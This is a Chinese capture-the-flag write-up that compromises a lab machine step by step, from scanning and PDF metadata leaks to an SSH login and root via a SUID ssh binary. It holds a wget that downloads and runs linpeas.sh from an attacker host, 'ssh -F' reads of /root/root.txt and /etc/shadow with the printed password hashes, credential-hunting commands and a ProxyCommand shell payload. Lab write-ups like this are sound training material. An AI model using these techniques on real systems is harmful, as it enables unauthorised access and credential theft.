1. 基本信息
靶机链接:
https://maze-sec.com/library
https://hackmyvm.eu/machines/machine.php?vm=
难度:⭐️⭐️
知识点:信息收集,目录扫描,md5计算,pdf属性提取,`exiftool`工具,`ssh`提权,`hash`爆破2. 信息收集
Nmap
└─# arp-scan -l | grep PCS
192.168.43.97 08:00:27:5f:cd:b8 PCS Systemtechnik GmbH
└─# IP=192.168.43.97
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-25 07:17 EDT
Nmap scan report for 192.168.43.97 (192.168.43.97)
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
8080/tcp open http-proxy
|_http-title: File Management System
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Wed, 25 Jun 2025 11:17:40 GMT
| Content-Length: 1415
| Content-Type: text/html; charset=utf-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>File Management System</title>
| <style>
| body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
| .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
| text-align: center; color: #333; }
| .error { color: red; text-align: center; }
| .hint { color: #555; text-align: center; font-style: italic; }
| input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
| button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_ button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :开放了22、80、8080端口,有两个web端口分别访问一下,8080端口需要token登陆,再扫一下目录
└─# dirsearch -u http://$IP:8080 -x 403 -e txt,php,html
Target: http://192.168.43.97:8080/
[07:33:02] Starting:
[07:33:02] 301 - 57B - /%2e%2e//google.com -> /%252E%252E/google.com
[07:33:30] 301 - 54B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[07:33:30] 301 - 65B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[07:33:30] 301 - 59B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[07:33:36] 301 - 87B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[07:33:48] 301 - 77B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[07:33:48] 301 - 74B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[07:33:49] 301 - 62B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[07:33:55] 301 - 72B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[07:34:04] 303 - 28B - /logout -> /
└─# gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x.txt,.php,.html,.bak
===============================================================
/index.html (Status: 200) [Size: 6]
/hint.txt (Status: 200) [Size: 44]使用Gobuster扫描80端口时,发现提示信息hint.txt
└─# curl -s http://$IP/hint.txt
What's the ultimate answer to the universe?
网页搜索可知宇宙的终极答案是42。获得8080端口登陆token:42
3.测试8080端口
拿到token:42,登陆http://192.168.43.97:8080/ 后显示文件转换系统
提示输出名称可以跳转到浏览页面http://192.168.43.97:8080/view/?filename=c4ca4238a0b923820dcc509a6f75849b.pdf,测试了并不能伪协议读文件,注意到文件名是32位的MD5值,去cmd5[网站](https://www.cmd5.com/)解码后是`1`,继续构造不同数字测试,发现文件名可以显示数字`100`内的`pdf`文件,编写个脚本全部取下来,注意带着`cookie "session_token=42"`
#bash脚本全部下载下来
for i in {1..100}; do curl -s -o "${i}.pdf" --cookie "session_token=42" "http://192.168.43.97:8080/view/?filename=$(echo -n $i | md5sum | awk '{print $1}').pdf"; done
===============================================================
#作者的wget方式
for i in {1..100}; do md5=$(echo -n $i | md5sum | awk '{print $1}'); wget --header="Cookie: session_token=42" "http://172.21.79.235:8080/view/?filename=${md5}.pdf"; done
===============================================================
#或者python脚本
import requests
import hashlib
import os
def download_pdfs():
base_url = "http://192.168.43.97:8080/view/?filename="
cookies = {'session_token': '42'} # 添加的cookies
for num in range(1, 100):
md5_hash = hashlib.md5(str(num).encode()).hexdigest()
pdf_url = f"{base_url}{md5_hash}.pdf"
filename = f"{num}.pdf"
try:
# 添加cookies到请求中
response = requests.get(
pdf_url,
cookies=cookies, # 关键修改:添加cookies
timeout=10
)
if response.status_code == 200:
with open(filename, 'wb') as f:
f.write(response.content)
print(f"成功下载: {filename}")
else:
print(f"下载失败 [{response.status_code}]: {filename}")
except Exception as e:
print(f"请求异常 [{filename}]: {str(e)}")
if __name__ == "__main__":
download_pdfs()
print("下载任务完成")粗略看了下大小都是2k,挨个翻,每个pdf页面除了数字编号不一样,没有通过字体颜色什么的隐藏信息,抽查了几个的十六进制文件也没有发现隐写数据,最后经过作者提醒,按大小排序在最大的第57个pdf文档属性的作者位置发现关键信息welcome:lamar57(就多了这么点隐藏信息)
linux排序一下也能快速定位文件大小异常的57.pdf
└─# ls -l | awk '{print $5, $8}' | sort -nr | uniq -u
1219 57.pdf
1194 100.pdf
1193 99.pdf
1193 98.pdf
1193 97.pdf
.......
#群主还提供了暴力一把嗦思路
strings *|sort|uniq
exiftool * | grep -Pi 'author' -A 20 -B 20再用exiftool工具就可发现关键信息welcome:lamar57
└─# exiftool 57.pdf
ExifTool Version Number : 13.00
File Name : 57.pdf
Directory : .
File Size : 1219 bytes
File Modification Date/Time : 2025:06:25 13:06:16-04:00
File Access Date/Time : 2025:06:25 13:06:16-04:00
File Inode Change Date/Time : 2025:06:25 13:06:16-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
Page Count : 1
Producer : FPDF 1.7
Title : Document 57
Subject : File Management System Document
Author : welcome:lamar57
Create Date : 2025:06:25 12:23:02
Modify Date : 2025:06:25 12:23:024.获得welcome权限
测试直接用welcome/lamar57成功ssh登陆靶机
└─# ssh welcome@$IP
welcome@192.168.43.97's password: #lamar57
Linux pdf 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
welcome@pdf:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)拿到user.txt
welcome@pdf:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
welcome@pdf:~$ cd
welcome@pdf:~$ ls
user.txt
welcome@pdf:~$ cat user.txt
flag{user-8d8b7d129eff7655df8d68bc7c23bfde}
welcome@pdf:~$ 5.获得root权限
没有sudo巴拉巴拉敏感文件
#dpkg -V、ps -ef、crontab -l
一、权限类文件探测
#SUID/SGID权限文件
find / -perm -u=s -type f 2>/dev/null # 查找SUID权限文件(属主权限继承)
find / -perm -g=s -type f 2>/dev/null # 查找SGID权限文件(属组权限继承)
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
高危示例:/bin/bash、/usr/bin/find 若配置SUID可能被用于提权。
#全局可写文件/目录
find / -writable -type d 2>/dev/null # 查找可写目录(用户已用)
find / -perm -o=w ! -type l 2>/dev/null # 查找全局可写文件(非符号链接)
二、敏感信息检索
#配置文件与密码泄露
grep -r "password" /etc 2>/dev/null # 递归搜索/etc目录下的密码字段
find / -name "*.bak" -o -name "*.old" 2>/dev/null # 查找备份文件
#SSH密钥与凭据
find / -name "id_rsa*" 2>/dev/null # 搜索SSH私钥文件
cat /etc/passwd /etc/shadow # 查看用户及密码哈希文件(需root权限)
#历史命令记录
cat ~/.bash_history # 当前用户命令历史
find /home -name ".*_history" 2>/dev/null # 所有用户的Shell历史文件
省事也可以上linpeas.sh脚本一把嗦
welcome@pdf:~$ busybox wget 192.168.43.148/CTF/linpeas.sh
Connecting to 192.168.43.148 (192.168.43.148:80)
linpeas.sh 100% |****************************************************************************| 808k 0:00:00 ETA
welcome@pdf:~$ ls
linpeas.sh user.txt
welcome@pdf:~$ chmod +x linpeas.sh
welcome@pdf:~$ ./linpeas.sh
重点关注标红的内容,容易发现 /usr/bin/ssh的SGID异常
welcome@pdf:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/ssh
welcome@pdf:~$ ls -l /usr/bin/ssh
-rwsr-sr-x 1 root root 797480 Dec 21 2023 /usr/bin/sshssh提权
gtfobins查表,有现成的读文件方案
#https://gtfobins.github.io/gtfobins/ssh/#shell
##File read
LFILE=file_to_read
ssh -F $LFILE localhost先读取/root/root.txt
welcome@pdf:~$ ssh -F /root/root.txt localhost
/root/root.txt: line 1: Bad configuration option: flag{root-21d72a06840925613b0ea50e84587620}
/root/root.txt: terminating, 1 bad configuration options再读取/etc/shadow
welcome@pdf:~$ ssh -F /etc/shadow localhost
/etc/shadow: line 1: Bad configuration option: root:$6$qgppm7vz3uxoh2kt$vkj8.on1has6b9.tm8ms5fwhmvmxrvz29bcznqmjfqojkphvaznoozhyt0.o2x3s3nbqrswpci.lhvk94armu.:20263:0:99999:7:::
....
welcome:$6$dhmqudmnaomw.das$o1bwxwdtmdf8n6xa5yupvk65ylc9jmuimtglu2lbsskmpah.lvot41/xsb.kxp1feszjevu8lpoylsvcdm2va.:20263:0:99999:7:::
/etc/shadow: terminating, 26 bad configuration options拿到root用户密码哈希值(格式为$6$...),这是Linux系统使用SHA-512算法加密的密码。爆破一下
└─# echo 'root:$6$qgppm7vz3uxoh2kt$vkj8.on1has6b9.tm8ms5fwhmvmxrvz29bcznqmjfqojkphvaznoozhyt0.o2x3s3nbqrswpci.lhvk94armu.:20263:0:99999:7:::'>hash
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt hash 直接爆破不行,因为ssh -F读文件会自动转为小写
本靶机虽然有私钥但漏配置了authorized_keys所以读root的私钥登录这条路也不行,如果靶机配置了authorized_keys就可以使用ssh -i /root/.ssh/id_rsa root@localhost 方式登陆了
如果像HYH一样欧皇运气爆棚,直接猜到root密码是57(数字是不是很熟悉,前面隐藏信息的就是第57个pdf),或许就成功和作者对上脑电波了
拿到root.txt
测试ProxyCommand 参数执行命令失败
#ProxyCommand参数执行命令
/usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x